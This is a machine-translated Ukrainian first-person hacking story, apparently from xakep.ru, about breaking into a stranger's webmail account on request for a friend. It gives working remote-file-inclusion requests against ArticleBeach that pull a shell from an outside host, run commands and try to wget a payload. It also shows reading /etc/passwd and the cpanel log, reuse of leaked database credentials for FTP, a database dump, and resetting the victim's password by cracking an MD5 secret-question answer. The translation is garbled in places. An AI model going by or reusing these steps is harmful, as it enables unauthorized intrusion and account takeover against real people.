Так повелося, що я ніколи не брався за злом мив.
Але тут надійшло привабливу пропозицію
від одного знайомого, якому конче потрібен був доступ до одного милу.
Саме мило розташовувалося на невеликій поштовику * .co.uk.
Знайомий пробував Брут мило, але результату це не принесло і він звернувся до мене.
Спершу я простмотрел сам поштовик.
Крім віконця введення логіна / пароля все суцільний html.
Спробував форму введення пароля на Sql-ін'єкцію, але ковичкі фільтрувалися.
Server: Apache / 1.3.34 (Unix) PHP / 5.0.5 mod_auth_passthrough / 1.8 mod_log_bytes / 1.2 mod_bwlimited / 1.4 FrontPage / 5.0.2.2635 mod_ssl / 2.8.25 OpenSSL / 0.9.7a
Окритія порти з сервісами теж не радували.
Вирішив перевірити, чи не хоститься чи тут ще хтось.
Виявилося з даного ip числиться ще кілька десятків сайтів.
Пройшовся по ним, єдиний phpBB виявився патчений, тому жоден з експлойтів не спрацював.
І тут я натрапив на продукт ArticleBeach www.articlebeach.com.
Перший же запит:
http: //www.***.com/index.php? page = http: //durito.narod.ru/sh&cmd=ls%20-lpa
видав мені список файлів сервера.
Даремно Програмісти ArticleBeach їли свій хліб з маслом.
полазити по сайту я знайшов ще одні баг, добродушно надісланий розробниками ArticleBeach,
в директорії / includes / будь-який користувач може переглянути файл config.inc такого змісту:
Приклад файлу узятий з сайту девелоперів ArticleBeach http://www.articlebeach.com/includes/config.inc
<?
global $ _cn;
global $ dbserver;
global $ db;
global $ dbuser;
global $ dbpass;
// mysql database server, login, password & Database name
$ dbserver = "localhost";
$ database_connect = "article_art";
$ dbuser = "article_jer";
$ dbpass = "aaaaa";
$ connect = mysql_connect ($ dbserver, $ dbuser, $ dbpass)
or die ( "Could not connect to MySQL");
mysql_select_db ($ database_connect, $ connect);
?>
Як ви вже зрозуміли це реквізити доступу до бази даних сервера.
На жаль в моєму випадку пароль на базу даних не підійшов до фтп,
чого не скажеш про інших сайтах, де стоїть продукт від ArticleBeach.
Довелося колупати сервер через зовнішню інклуд.
Відкривши / etc / passwd я не зміг виявити ім'я потрібного мені поштовика,
логіни користувачів і доменні імена сайтів незбіжними.
Зате була можливість переглядати web-директорії користувачів: / home / * / public_html /
Уже хотів було почати тупо перебирати всіх за списком, але вирішив перевірити файл accounting.log,
в якому зберігаються логіни і доменні імена на cpanel.
І точно я отримав список доменних імен.
Вибрав потрібний і став вивчати веб-директорію.
Швидко знайшов в исходниках реквізити доступу до БД MySQL:
'database' => '*** _ themail', // Name of your MySQL database
'username' => '*** _ postman', // The username and password that
'password' => 'jkretj3h45j'
Пароль знову не підійшов до фтп.
Залишилося тільки причепиться до БД.
Треба було шукати доступну на запис директорію або файл.
І знову спасибі розробникам ArticleBeach які подбали в своєму продукті про директорії / backup / с правами drwxrwxrwx.
http: //www.***.com/index.php? page = http: //durito.narod.ru/sh&cmd=wget -O backup / sql.php http://durito.narod.ru/sql. php
і фіг, те ж саме з GET, links, fetch, lynx.
Пізніше я дізнався, що запуск wget і GET заборонявся PHP Secure, links, fetch і lynx отсутсвовали.
Продовжив внутрішній огляд сайтів хостера.
Навиужівал ще кілька паролів до БД, але до фтп вони знову не підійшли, все паролі представляли собою багатосимвольний абракадабру.
І раптом тайванський сайт, інтуїція підказала перевірити його і ось воно - пароль доступу до БД - anahol !!!
Конект до фтп, пас проходить і скрипт для роботи з БД від rst.void.ru залитий.
Конект до бази, знаходжу потрібну таблицю і Дампле її.
А ось і заповітне мило, пароль правда зашифрований MD5,
але це можна поправити, правда довгий і клопітно.
Але для початку я вирішив перевірити хеш на http://md5.rednoize.com/, але пас
не був знайдений, і я вже приготувався було до довгого перебору, але тут помітив, що і відповідь на секретне питання теж закодований в MD5.
Пробиваю на md5.rednoize.com секретне питання і ось він: Cheung !!!
Заходжу НЕ поштовик і відповідаю на секретне питання.
Мені пропонують ввести новий пароль і його підтвердити.
Шах і мат!
І мій приятель отримує доступ до заповітного милу, незабутні мені викотити пива.
А я йду його жадібно поглинати.
опублікована на www.xakep.ru
Твій bug Durito.
_________________
EAT THE RICH!
|
Коментарі
Коментуючи, пам'ятайте про те, що зміст і тон Вашого повідомлення можуть зачіпати почуття реальних людей, проявляйте повагу та толерантність до своїх співрозмовників навіть у тому випадку, якщо Ви не поділяєте їхню думку, Ваша поведінка за умов свободи висловлювань та анонімності, наданих інтернетом, змінює не тільки віртуальний, але й реальний світ. Всі коменти приховані з індексу, спам контролюється.